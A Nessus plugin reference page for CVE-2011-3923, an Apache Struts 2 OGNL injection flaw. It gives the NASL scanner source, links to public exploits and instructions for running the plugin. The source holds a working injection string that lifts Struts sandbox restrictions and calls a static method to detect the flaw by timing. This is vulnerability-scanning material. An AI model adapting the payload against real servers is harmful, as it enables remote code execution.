Apache Struts 2 ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution - Nessus

Critical   Plugin ID: 57850

This page contains detailed information about the Apache Struts 2 ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.

Plugin Overview


ID: 57850
Name: Apache Struts 2 ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
Filename: struts_xwork_ognl_code_execution_safe2.nasl
Vulnerability Published: 2012-01-22
This Plugin Published: 2012-02-06
Last Modification Time: 2022-04-11
Plugin Version: 1.28
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: http_version.nasl, webmirror.nasl

Vulnerability Information


Severity: Critical
Vulnerability Published: 2012-01-22
Patch Published: 2012-01-22
CVE [?]: CVE-2011-3923
CPE [?]: cpe:/a:apache:struts

Synopsis

A remote web application uses a framework that is affected by a code execution vulnerability.

Description

The remote web application appears to use Apache Struts 2, a web framework that uses XWork. Due to a flaw in the ParameterInterceptor class, user input is not properly sanitized, which allows a remote attacker to run arbitrary Java code on the remote host by sending a specially crafted HTTP request.

Solution

Upgrade to Struts 2.3.1.2 or later.

Public Exploits


Target Network Port(s): 80, 8080
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB, GitHub, Immunity Canvas, D2 Elliot)
Exploit Ease: No exploit is required

Here's the list of publicly known exploits and PoCs for verifying the Apache Struts 2 ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution vulnerability:

  1. Metasploit: exploit/multi/http/struts_code_exec_parameters
    [Apache Struts ParametersInterceptor Remote Code Execution]
  2. Exploit-DB: exploits/multiple/remote/24874.rb
    [EDB-24874: Apache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit)]
  3. Exploit-DB: exploits/php/webapps/34062.txt
    [EDB-34062: Shopizer 1.1.5 - Multiple Vulnerabilities]
  4. GitHub: https://github.com/0day666/Vulnerability-verification
    [CVE-2011-3923]
  5. GitHub: https://github.com/SexyBeast233/SecBooks
    [CVE-2011-3923]
  6. GitHub: https://github.com/fupinglee/Struts2_Bugs
    [CVE-2011-3923]
  7. GitHub: https://github.com/woods-sega/woodswiki
    [CVE-2011-3923]
  8. Immunity Canvas: White_Phosphorus

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information


CVSS Score Source [?]: CVE-2011-3923
CVSS V2 Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C
CVSS Base Score:10.0 (High)
Impact Subscore:10.0
Exploitability Subscore:10.0
CVSS Temporal Score:8.3 (High)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:8.3 (High)
CVSS V3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C
CVSS Base Score:9.8 (Critical)
Impact Subscore:5.9
Exploitability Subscore:3.9
CVSS Temporal Score:9.1 (Critical)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:9.1 (Critical)

Go back to menu.

Plugin Source


This is the struts_xwork_ognl_code_execution_safe2.nasl nessus plugin source code. This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(57850);
  script_version("1.28");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2011-3923");
  script_bugtraq_id(51628);
  script_xref(name:"EDB-ID", value:"24874");

  script_name(english:"Apache Struts 2 ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution");

  script_set_attribute(attribute:"synopsis", value:
"A remote web application uses a framework that is affected by a code
execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote web application appears to use Apache Struts 2, a web
framework that uses XWork. Due to a flaw in the ParameterInterceptor
class, user input is not properly sanitized, which allows a remote
attacker to run arbitrary Java code on the remote host by sending a
specially crafted HTTP request.");
  script_set_attribute(attribute:"see_also", value:"http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html");
  script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-009");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Struts 2.3.1.2 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2011-3923");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"d2_elliot_name", value:"Apache-Struts ParameterInterceptor < 2.3.1.2 RCE Linux");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Apache Struts ParametersInterceptor Remote Code Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:"White_Phosphorus");

  script_set_attribute(attribute:"vuln_publication_date", value:"2012/01/22");
  script_set_attribute(attribute:"patch_publication_date", value:"2012/01/22");
  script_set_attribute(attribute:"plugin_publication_date", value:"2012/02/06");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl", "webmirror.nasl");
  script_require_ports("Services/www", 80, 8080);

  exit(0);
}

include("http.inc");
include("webapp_func.inc");
include("torture_cgi.inc");

port = get_http_port(default:8080);
cgis = get_kb_list('www/' + port + '/cgi');

urls = make_list();
# To identify actions that we can test the exploit on we will look
# for files with the .action / .jsp / .do suffix from the KB.
if (!isnull(cgis))
{
  foreach cgi (cgis)
  {
    match = pregmatch(pattern:"((^.*)(/.+\.act(ion)?)($|\?|;))", string:cgi);
    if (match)
    {
      urls = make_list(urls, match[0]);
      if (!thorough_tests) break;
    }
    match2 = pregmatch(pattern:"(^.*)(/.+\.jsp)$", string:cgi);
    if (!isnull(match2))
    {
      urls = make_list(urls, match2[0]);
      if (!thorough_tests) break;
    }
    match3 = pregmatch(pattern:"(^.*)(/.+\.do)$", string:cgi);
    if (!isnull(match3))
    {
      urls = make_list(urls, match3[0]);
      if (!thorough_tests) break;
    }
    if (cgi =~ "struts2?(-rest)?-showcase")
    {
      urls = make_list(urls, cgi);
      if (!thorough_tests) break;
    }
  }
}
if (thorough_tests)
{
  cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');
  if (!isnull(cgi2)) urls = make_list(urls, cgi2);

  cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');
  if (!isnull(cgi3)) urls = make_list(urls, cgi3);

  cgi4 = get_kb_list('www/' + port + '/content/extensions/do');
  if (!isnull(cgi4)) urls = make_list(urls, cgi4);
}

urls = make_list(urls, "/");

urls = list_uniq(urls);

secs = make_list(5, 10, 20);
vuln_actions = make_list();

foreach dir (urls)
{
  # find a list of args to test against
  cgi_args = get_cgi_arg_list(port: port, cgi: dir);
  foreach arg (cgi_args)
  {
    # assume the action is vulnerable unless proven otherwise
    vuln = TRUE;
    for (i = 0; i < max_index(secs) && vuln; i++)
    {
      millis = secs[i] * 1000;
      ognl = arg +
             '=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]' +
             '%3D+new+java.lang.Boolean(false),' +
             '%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d' +
             '+new+java.lang.Boolean(true),%20'+
             '@java.lang.Thread@sleep(' + millis + '))(meh)&z[('+arg+')' +
             '(%27meh%27)]=true';
      url = dir + '?' + ognl;
      http_set_read_timeout(secs[i] * 2);
      then = unixtime();
      res = http_send_recv3(
        method:'GET',
        item:url,
        port:port,
        exit_on_fail:TRUE
      );
      now = unixtime();

      # if it looks like this action isn't vulnerable, move on to checking
      # the next one
      if ( now - then < secs[i] || now - then > (secs[i]+5) ) vuln = FALSE;
    }
    if (vuln) break;
  }
  if (vuln) break;
}

if (!vuln) exit(0, 'No affected applications were detected on the web server listening on port '+port+'.');

if (report_verbosity > 0)
{
  report = get_vuln_report(
    header:
      'Nessus determined a struts 2 application is vulnerable by\n'+
      'forcing it to sleep() before sending the server\'s response.\n'+
      'This was verified using the following URL :',
    trailer:
      'Please note Nessus stopped after detecting the first vulnerable\n'+
      'application. Others may be affected.',
    items:url,
    port:port
  );
  security_hole(port:port, extra:report);
}
else security_hole(port);

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/struts_xwork_ognl_code_execution_safe2.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\struts_xwork_ognl_code_execution_safe2.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/struts_xwork_ognl_code_execution_safe2.nasl

Go back to menu.

How to Run


Here is how to run the Apache Struts 2 ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select CGI abuses plugin family.
  6. On the right side table select Apache Struts 2 ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution plugin ID 57850.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl struts_xwork_ognl_code_execution_safe2.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a struts_xwork_ognl_code_execution_safe2.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - struts_xwork_ognl_code_execution_safe2.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state struts_xwork_ognl_code_execution_safe2.nasl -t <IP/HOST>

Go back to menu.

References


BID | SecurityFocus Bugtraq ID: See also: Similar and related Nessus plugins:
  • 143125 - Apache Struts 2.x < 2.3.1.1 Multiple Vulnerabilities
  • 117403 - Apache Struts 2.x < 2.3.1.2 RCE (S2-009)
  • 66935 - Apache Struts 2 Crafted Parameter Arbitrary OGNL Expression Remote Command Execution
  • 66931 - Apache Struts 2 OGNL Expression Handling Double Evaluation Error Remote Command Execution
  • 68981 - Apache Struts 2 'action:' Parameter Arbitrary Remote Command Execution
  • 70168 - Apache Struts 2 'action:' Parameter Prefix Security Constraint Bypass
  • 73203 - Apache Struts 2 'class' Parameter ClassLoader Manipulation
  • 119728 - Apache Struts 2 'method:' Prefix Arbitrary Remote Command Execution
  • 90152 - Apache Struts 2 Tag Attribute Double OGNL Evaluation RCE
  • 91811 - Apache Struts 2 REST Plugin OGNL Expression Handling RCE
  • 102918 - Apache Struts 2.3.x Struts 1 plugin RCE (remote)
  • 97610 - Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)
  • 102977 - Apache Struts 2 REST Plugin XStream XML Request Deserialization RCE
  • 112064 - Apache Struts CVE-2018-11776 Results With No Namespace Remote Code Execution (S2-057) (remote)
  • 144365 - Apache Struts 2.x < 2.5.26 RCE (S2-061) (direct check)
  • 69240 - Apache Struts 2 ExceptionDelegator Arbitrary Remote Command Execution
  • 57691 - Apache Struts 2 Multiple Remote Code Execution and File Overwrite Vulnerabilities (safe check) (deprecated)
  • 47900 - Apache Struts 2 / XWork Remote Code Execution (safe check)

Version


This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file struts_xwork_ognl_code_execution_safe2.nasl version 1.28. For more plugins, visit the Nessus Plugin Library.

Go back to menu.